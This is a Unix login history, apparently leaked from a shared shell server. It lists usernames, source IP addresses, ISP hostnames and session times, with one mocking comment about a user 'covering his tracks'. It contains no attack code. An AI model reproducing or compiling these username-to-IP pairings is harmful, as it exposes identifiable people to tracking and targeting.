+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
+pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
+katsst           ttypd    cpe-75-84-149-5. Mon Jun 22 02:44 - 03:14  (00:30)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
+katsst           ttypg    cpe-75-84-149-5. Mon Jun 22 00:20 - 00:50  (00:30)
+hts              ttypf    pool-71-114-161- Mon Jun 22 00:15 - 00:49  (00:33)
+smash            ttypd    c-98-232-250-179 Sun Jun 21 22:54 - 01:28  (02:34)
+chaos1           ttypd    c-69-143-254-180 Sun Jun 21 22:06 - 22:09  (00:03)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
+apo              ttypd    d75-152-200-195. Sun Jun 21 15:03 - 15:26  (00:22)
+apo              ttypd    d75-152-200-195. Sun Jun 21 15:03 - 15:03  (00:00)
+kokoryu          ftp      82-45-111-232.c  Sun Jun 21 13:43 - 13:54  (00:10)
+cazz1961         ttypd    5ad95c74.bb.sky. Sun Jun 21 06:09 - 06:40  (00:30)
+ste              ttype    doc-24-32-94-198 Sat Jun 20 20:50 - 21:21  (00:30)
+matt             ttypd    71.81.144.135    Sat Jun 20 19:27 - 20:00  (00:32)
+matt             ftp      71.81.144.135    Sat Jun 20 19:24 - 19:30  (00:06)
+matt             ttypd    71.81.144.135    Sat Jun 20 18:09 - 18:46  (00:36)
+matt             ftp      71.81.144.135    Sat Jun 20 17:19 - 17:24  (00:05)
+matt             ttypd    71.81.144.135    Sat Jun 20 17:06 - 17:56  (00:50)
+matt             ftp      71.81.144.135    Sat Jun 20 17:04 - 17:09  (00:05)
+matt             ftp      71.81.144.135    Sat Jun 20 16:56 - 17:02  (00:05)
+yaquis           ttypd    ip72-223-92-235. Sat Jun 20 16:35 - 17:05  (00:30)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:22 - 14:23  (00:01)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:17 - 14:22  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:12 - 14:16  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:06 - 14:11  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:01 - 14:06  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:56 - 14:01  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:51 - 13:56  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:46 - 13:50  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:40 - 13:45  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:35 - 13:40  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:30 - 13:35  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:25 - 13:30  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:20 - 13:25  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:15 - 13:19  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:09 - 13:14  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:04 - 13:09  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:59 - 13:04  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:54 - 12:59  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:49 - 12:54  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:44 - 12:48  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:38 - 12:43  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:33 - 12:38  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:28 - 12:33  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:23 - 12:28  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:18 - 12:23  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:13 - 12:17  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:07 - 12:12  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:02 - 12:07  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:57 - 12:02  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:52 - 11:57  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:47 - 11:51  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:41 - 11:46  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:36 - 11:41  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:31 - 11:36  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:26 - 11:31  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:21 - 11:26  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:16 - 11:20  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:10 - 11:15  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:05 - 11:10  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:00 - 11:05  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:55 - 11:00  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:50 - 10:55  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:45 - 10:49  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:39 - 10:44  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:34 - 10:39  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:29 - 10:34  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:24 - 10:29  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:19 - 10:24  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:14 - 10:18  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:08 - 10:13  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:03 - 10:08  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:58 - 10:03  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:53 - 09:58  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:48 - 09:53  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:43 - 09:47  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:37 - 09:42  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:32 - 09:37  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:27 - 09:32  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:22 - 09:27  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:17 - 09:22  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:12 - 09:16  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:06 - 09:11  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:01 - 09:06  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:56 - 09:01  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:51 - 08:56  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:46 - 08:51  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:41 - 08:45  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:35 - 08:40  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:30 - 08:35  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:25 - 08:30  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:20 - 08:25  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:15 - 08:20  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:10 - 08:14  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:02 - 08:09  (00:07)
+omgwtf           ttypd    24-216-119-13.dh Sat Jun 20 04:49 - 04:55  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
+kruapra          ttypd    75.80.56.213     Sat Jun 20 01:08 - 01:38  (00:30)
+yaquis           ttypd    186.136.137.30   Fri Jun 19 23:51 - 23:57  (00:05)
+yaquis           ttypd    ip72-223-92-235. Fri Jun 19 22:17 - 22:48  (00:30)
+pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
+psycoz           ttypd    xdsl-213-196-228 Fri Jun 19 18:53 - 19:10  (00:16)
+psycoz           ttypd    xdsl-213-196-228 Fri Jun 19 18:50 - 18:50  (00:00)
+yaquis           ttypd    186.136.137.30   Fri Jun 19 18:24 - 18:27  (00:02)
+matt             ftp      75-130-211-104.  Fri Jun 19 17:13 - 17:23  (00:09)
+matt             ftp      75-130-211-104.  Fri Jun 19 16:57 - 17:02  (00:05)
+matt             ttypd    75-130-211-104.d Fri Jun 19 16:56 - 17:12  (00:16)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:49 - 15:50  (00:00)
+matt             ttypd    75-130-211-104.d Fri Jun 19 15:44 - 15:50  (00:05)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:43 - 15:49  (00:05)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:18 - 15:36  (00:18)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:10 - 15:16  (00:06)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:02 - 15:08  (00:05)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:55 - 15:00  (00:05)
+matt             ttypd    75-130-211-104.d Fri Jun 19 14:48 - 15:36  (00:47)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:46 - 14:53  (00:06)
+matt             ttypd    75-130-211-104.d Fri Jun 19 14:33 - 14:46  (00:12)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:29 - 14:40  (00:10)
+matt             ttypd    75-130-211-104.d Fri Jun 19 14:18 - 14:33  (00:14)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:17 - 14:25  (00:07)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:14 - 14:15  (00:01)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:06 - 14:11  (00:05)
+pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
+smash            ttypd    ntora.eml.ee     Thu Jun 18 20:44 - 21:12  (00:28)
+yaquis           ttypd    186.136.137.30   Thu Jun 18 18:21 - 18:29  (00:08)
+chaos1           ttypf    94-195-18-213.zo Thu Jun 18 16:34 - 16:41  (00:07)
+cpu              ttype    63-253-113-213.i Thu Jun 18 15:55 - 18:16  (02:21)
+cpu              ttypd    63-253-113-213.i Thu Jun 18 14:00 - 18:03  (04:03)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
+pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01) 
+romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00) // RoMeO covering his tracks, once again.. lulz
+cpu              ttype    63-253-113-213.i Wed Jun 17 17:50 - 17:54  (00:04)
+cpu              ttypd    63-253-113-213.i Wed Jun 17 17:33 - 19:56  (02:22)
+cpu              ttypd    63-253-113-213.i Wed Jun 17 17:23 - 17:27  (00:04)
+katsst           ttypd    adsl-76-240-177- Wed Jun 17 12:39 - 13:09  (00:30)
+yaquis           ttyp2    ip72-223-92-235. Wed Jun 17 01:49 - 01:54  (00:05)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:46 - 20:16  (00:30)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:33 - 19:46  (00:13)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:24 - 19:33  (00:08)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:16 - 19:24  (00:07)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:08 - 19:16  (00:08)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 19:01 - 19:08  (00:07)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:44 - 19:01  (00:16)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:37 - 18:44  (00:06)
+yaquis           ttypd    ip72-223-92-235. Tue Jun 16 18:12 - 18:20  (00:07)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:02 - 18:32  (00:30)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 13:47 - 14:17  (00:30)
+matt             ttyp2    71-91-220-184.dh Tue Jun 16 10:58 - 11:40  (00:42)
+devil            ttyp2    190.42.73.135    Tue Jun 16 10:18 - 10:18  (00:00)
+katsst           ttyp9    cpe-75-84-149-5. Tue Jun 16 00:10 - 00:40  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Tue Jun 16 00:08 - 00:38  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Mon Jun 15 22:45 - 23:15  (00:30)
+matt             ttyp2    71-91-220-184.dh Mon Jun 15 22:05 - 22:19  (00:14)
+kruapra          ttyp2    75.80.56.213     Mon Jun 15 21:13 - 21:43  (00:30)
+yaquis           ttyp9    189.176.226.15   Mon Jun 15 15:57 - 15:57  (00:00)
+matt             ttyp2    71-91-220-184.dh Mon Jun 15 15:52 - 16:18  (00:26)
+chaos1           ttyp2    94-195-18-213.zo Mon Jun 15 13:53 - 14:26  (00:33)
+crrj13           ttyp2    c-24-23-247-110. Mon Jun 15 13:01 - 13:01  (00:00)
+crrj13           ttypd    h-67-103-110-220 Mon Jun 15 12:48 - 12:53  (00:05)
+katsst           ttyp9    cpe-75-84-149-5. Mon Jun 15 12:31 - 13:01  (00:30)
+ste              ttyp2    doc-24-32-94-198 Mon Jun 15 12:22 - 12:59  (00:37)
+katsst           ttyp6    cpe-75-84-149-5. Mon Jun 15 05:43 - 06:13  (00:30)
+alexbb           ttyp6    53551eb9.cable.c Sun Jun 14 22:36 - 22:41  (00:05)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 22:20 - 22:50  (00:30)
+katsst           ttyp9    cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41  (00:30)
+katsst           ttyp8    cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41  (00:30)
+kruapra          ttyp6    75.80.56.213     Sun Jun 14 13:17 - 13:19  (00:02)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 10:44 - 16:13  (05:29)
+katsst           ttyp6    cpe-75-84-149-5. Sun Jun 14 09:48 - 10:18  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 07:42 - 08:12  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 00:29 - 00:59  (00:30)
+poolboy          ttyp2    pool-173-77-179- Sat Jun 13 22:47 - 23:21  (00:33)
+matt             ttyp8    71.81.151.8      Sat Jun 13 21:01 - 22:39  (01:37)
+yaquis           ttyp6    ip72-223-92-235. Sat Jun 13 20:54 - 21:35  (00:41)
+katsst           ttyp2    cpe-75-84-149-5. Sat Jun 13 20:37 - 21:07  (00:30)
+katsst           ttyp2    adsl-76-240-177- Sat Jun 13 17:26 - 17:56  (00:30)
+kruapra          ttyp2    75.80.56.213     Sat Jun 13 15:57 - 16:04  (00:06)
+kruapra          ttyp2    75.80.56.213     Sat Jun 13 15:19 - 15:43  (00:24)
+katsst           ttyp2    adsl-76-240-177- Sat Jun 13 13:01 - 13:31  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Sat Jun 13 11:49 - 12:19  (00:30)
+katsst           ttyp6    cpe-75-84-149-5. Sat Jun 13 09:15 - 09:45  (00:30)
+matt             ttyp2    71-14-179-247.dh Fri Jun 12 23:23 - 00:56  (01:33)
+lyhne1           ttyp2    74-44-57-79.dr01 Fri Jun 12 21:25 - 21:37  (00:11)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 15:01 - 15:05  (00:03)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:55 - 15:01  (00:06)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:47 - 14:54  (00:06)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:39 - 14:47  (00:07)
+katsst           ttyp6    adsl-76-240-177- Fri Jun 12 14:34 - 14:39  (00:04)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:32 - 14:36  (00:03)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:31 - 14:32  (00:01)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:20 - 14:31  (00:10)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:14 - 14:19  (00:05)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:11 - 14:14  (00:03)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:01 - 14:10  (00:09)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:52 - 14:01  (00:08)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:49 - 13:52  (00:03)
+yaquis           ttyp6    189.172.83.139   Fri Jun 12 13:31 - 13:36  (00:05)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:26 - 13:49  (00:23)
+matt             ttyp2    71.81.144.125    Fri Jun 12 11:56 - 12:16  (00:20)
+matt             ttyp2    71-91-221-246.dh Thu Jun 11 22:15 - 03:21  (05:05)
+matt             ttyp2    71-91-221-246.dh Thu Jun 11 20:58 - 21:02  (00:03)
+yaquis           ttyp2    ip72-223-92-235. Thu Jun 11 20:24 - 20:55  (00:31)
+kruapra          ttyp2    75.80.56.213     Thu Jun 11 19:49 - 20:19  (00:30)
+smash            ttyp6    88.196.163.223   Thu Jun 11 17:10 - 18:03  (00:53)
+yaquis           ttyp2    189.176.224.156  Thu Jun 11 16:20 - 16:24  (00:04)
+yaquis           ttyp2    189.176.224.156  Thu Jun 11 16:11 - 16:16  (00:05)
+yaquis           ttyp6    189.176.224.156  Thu Jun 11 14:31 - 14:32  (00:01)
+hts              ttyp2    pool-71-114-161- Thu Jun 11 10:54 - 10:56  (00:01)
+sysc             ttyp6    66.197.170.181   Thu Jun 11 07:33 - 07:52  (00:19)
+sysc             ttyp6    66.197.170.181   Thu Jun 11 07:13 - 07:26  (00:13)
+blkgraz          ttyp2    71.252.210.34    Thu Jun 11 06:15 - 10:54  (04:39)
+sysc             ttyp2    218.236.90.157   Thu Jun 11 05:38 - 05:43  (00:04)
+alexbb           ttyp2    83.85.30.185     Thu Jun 11 04:46 - 04:49  (00:03)
+blkgraz          ttyp2    71.252.210.34    Thu Jun 11 04:00 - 04:46  (00:45)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 22:30 - 22:44  (00:14)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 22:00 - 22:30  (00:30)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 21:29 - 21:59  (00:30)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 20:59 - 21:29  (00:30)
+matt             ttyp6    75.130.209.152   Wed Jun 10 20:54 - 00:28  (03:33)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 20:29 - 20:59  (00:30)
+bollox           ttyp2    81.129.70.166    Wed Jun 10 16:42 - 17:01  (00:18)
+qfx              ttyp2    62.194.154.102   Wed Jun 10 14:29 - 15:38  (01:08)
+blkgraz          ttyp6    71.252.210.34    Wed Jun 10 03:38 - 20:54  (17:16)
+hts              ttyp6    71.114.161.104   Wed Jun 10 00:28 - 00:29  (00:00)
+sqd              ftp      121.210.177.215  Tue Jun  9 19:46 - 19:51  (00:05)
+crrj13           ttyp6    71.202.99.66     Tue Jun  9 16:50 - 16:51  (00:00)
+katsst           ttyp6    76.240.177.107   Tue Jun  9 14:55 - 15:25  (00:30)
+matt             ttyp2    71.81.151.141    Tue Jun  9 14:27 - 04:04  (13:36)
+redrum           ttyp2    iani.de          Tue Jun  9 13:36 - 13:38  (00:02)
+katsst           ttyp8    76.240.177.107   Tue Jun  9 13:34 - 14:04  (00:30)
+redrum           ttyp2    iani.de          Tue Jun  9 13:33 - 13:35  (00:01)
+katsst           ttyp2    76.240.177.107   Tue Jun  9 13:01 - 13:31  (00:30)
+chaos1           ttyp6    69.143.254.180   Tue Jun  9 12:53 - 13:36  (00:42)
+redrum           ttyp2    iani.de          Tue Jun  9 12:48 - 13:01  (00:12)
+qfx              ttyp2    62.194.154.102   Tue Jun  9 11:06 - 11:37  (00:31)
+psycoz           ttyp2    81.173.252.237   Tue Jun  9 05:28 - 05:34  (00:06)
+alexbb           ttyp6    83.85.30.185     Mon Jun  8 23:26 - 03:39  (04:13)
+yaquis           ttyp6    72.223.92.235    Mon Jun  8 22:37 - 22:57  (00:20)
+matt             ttyp6    75.130.211.22    Mon Jun  8 20:46 - 21:03  (00:16)
+blkgraz          ttyp8    71.252.210.34    Mon Jun  8 20:13 - 13:34  (17:21)
+ste              ttyp6    69.29.159.182    Mon Jun  8 19:10 - 20:46  (01:36)
+matt             ttyp2    75.130.211.22    Mon Jun  8 17:20 - 00:57  (07:37)
+matt             ttyp6    75.130.211.22    Mon Jun  8 16:28 - 17:15  (00:46)
+matt             ttyp2    75.130.211.22    Mon Jun  8 13:29 - 16:30  (03:01)
+matt             ttyp2    75.130.211.22    Mon Jun  8 13:12 - 13:28  (00:16)
+alexbb           ttyp8    83.85.30.185     Mon Jun  8 11:26 - 12:18  (00:52)
+matt             ttyp6    75.130.211.22    Mon Jun  8 11:24 - 11:32  (00:08)
+matt             ttyp2    75.130.211.22    Mon Jun  8 11:21 - 11:51  (00:30)
+chaos1           ttyp2    69.143.254.180   Mon Jun  8 06:25 - 06:29  (00:03)
+alexbb           ttyp6    83.85.30.185     Sun Jun  7 21:59 - 22:31  (00:31)
+chaos1           ttyp6    69.143.254.180   Sun Jun  7 21:09 - 21:11  (00:01)
+yaquis           ttyp6    72.223.92.235    Sun Jun  7 19:05 - 19:28  (00:22)
+matt             ttyp2    71.81.144.135    Sun Jun  7 18:25 - 00:49  (06:23)
+matt             ttyp2    71.81.144.135    Sun Jun  7 18:02 - 18:25  (00:23)
+yaquis           ttyp2    72.223.92.235    Sun Jun  7 17:25 - 17:56  (00:31)
+psycoz           ttyp2    84.44.225.41     Sun Jun  7 17:01 - 17:13  (00:11)
+psycoz           ttyp2    84.44.225.41     Sun Jun  7 16:51 - 17:01  (00:10)
+alexbb           ftp      53551EB9.cable.  Sun Jun  7 15:40 - 15:40  (00:00)
+alexbb           ttyp2    83.85.30.185     Sun Jun  7 15:30 - 15:42  (00:12)
+sysc             ttyp2    24.183.103.36    Sun Jun  7 12:18 - 12:59  (00:41)
+yaquis           ttyp2    72.223.92.235    Sun Jun  7 01:52 - 02:28  (00:35)
+kruapra          ttyp2    75.80.56.213     Sat Jun  6 21:29 - 21:59  (00:30)
+cazz1961         ttyp2    81.159.148.247   Sat Jun  6 19:03 - 19:40  (00:36)
+cazz1961         ttyp6    90.205.23.22     Sat Jun  6 18:37 - 19:07  (00:30)
+katsst           ttyp2    76.240.177.107   Sat Jun  6 18:24 - 18:54  (00:30)
+katsst           ttyp2    76.240.177.107   Sat Jun  6 16:18 - 16:48  (00:30)
+katsst           ttyp2    76.240.177.107   Sat Jun  6 12:34 - 13:04  (00:30)
+sysc             ttyp2    66.197.170.181   Sat Jun  6 11:54 - 12:08  (00:14)
+yaquis           ttyp2    189.176.79.52    Sat Jun  6 11:38 - 11:45  (00:07)
+devil            ttyp6    190.42.90.138    Sat Jun  6 09:34 - 09:34  (00:00)
+cazz1961         ttyp2    90.205.23.123    Sat Jun  6 09:21 - 09:55  (00:33)
+howell1          ttyp2    93.97.125.103    Sat Jun  6 08:22 - 08:22  (00:00)
+asriel           ttyp2    66.197.170.181   Sat Jun  6 07:36 - 07:37  (00:00)
+sysc             ttyp2    66.197.170.181   Sat Jun  6 06:57 - 07:32  (00:35)
+yaquis           ttyp2    72.223.92.235    Sat Jun  6 01:18 - 01:44  (00:25)
+yaquis           ttyp2    189.176.79.52    Sat Jun  6 01:11 - 01:13  (00:02)
+blkgraz          ttyp8    71.252.210.34    Fri Jun  5 18:54 - 11:26 (2+16:31)
+katsst           ttyp6    76.240.177.107   Fri Jun  5 18:41 - 19:11  (00:30)
+smash            ttyp6    ntora.eml.ee     Fri Jun  5 18:07 - 18:07  (00:00)
+smash            ttyp8    ntora.eml.ee     Fri Jun  5 15:03 - 15:03  (00:00)
+chaos1           ttyp6    69.143.254.180   Fri Jun  5 15:02 - 15:52  (00:50)
+chaos1           ttyp8    69.143.254.180   Fri Jun  5 12:34 - 12:40  (00:06)
+smash            ttyp6    ntora.eml.ee     Fri Jun  5 12:18 - 13:09  (00:50)
+yaquis           ttyp6    72.223.92.235    Fri Jun  5 00:56 - 01:21  (00:24)
+smash            ttyp6    ntora.eml.ee     Fri Jun  5 00:13 - 00:21  (00:07)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:41 - 19:45  (00:03)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:36 - 19:41  (00:05)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:32 - 19:35  (00:03)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:27 - 19:31  (00:04)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:18 - 19:27  (00:09)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:13 - 19:17  (00:04)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:04 - 19:13  (00:08)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:57 - 19:04  (00:06)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:52 - 18:57  (00:04)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:41 - 18:52  (00:10)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:39 - 18:41  (00:02)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:28 - 18:39  (00:10)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:18 - 18:24  (00:06)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:14 - 18:18  (00:03)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:08 - 18:14  (00:06)
+katsst           ttyp8    76.240.177.107   Thu Jun  4 18:06 - 18:06  (00:00)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:55 - 18:08  (00:12)
+bollox           ftp      host81-129-70-1  Thu Jun  4 17:47 - 17:49  (00:01)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:44 - 17:55  (00:11)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:34 - 17:44  (00:10)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:29 - 17:34  (00:04)
+smash            ttyp6    88.196.163.223   Thu Jun  4 16:39 - 17:06  (00:27)
+bollox           ttyp9    81.129.70.166    Thu Jun  4 16:12 - 16:44  (00:32)
+bollox           ftp      host81-129-70-1  Thu Jun  4 16:05 - 16:09  (00:04)
+chaos1           ttyp8    94.195.18.213    Thu Jun  4 15:50 - 16:23  (00:32)
+chaos1           ttyp6    67.86.132.29     Thu Jun  4 15:49 - 16:15  (00:26)
+chaos1           ttyp6    69.143.254.180   Wed Jun  3 23:06 - 23:52  (00:45)
+apo              ttyp8    75.158.79.102    Wed Jun  3 12:38 - 12:44  (00:05)
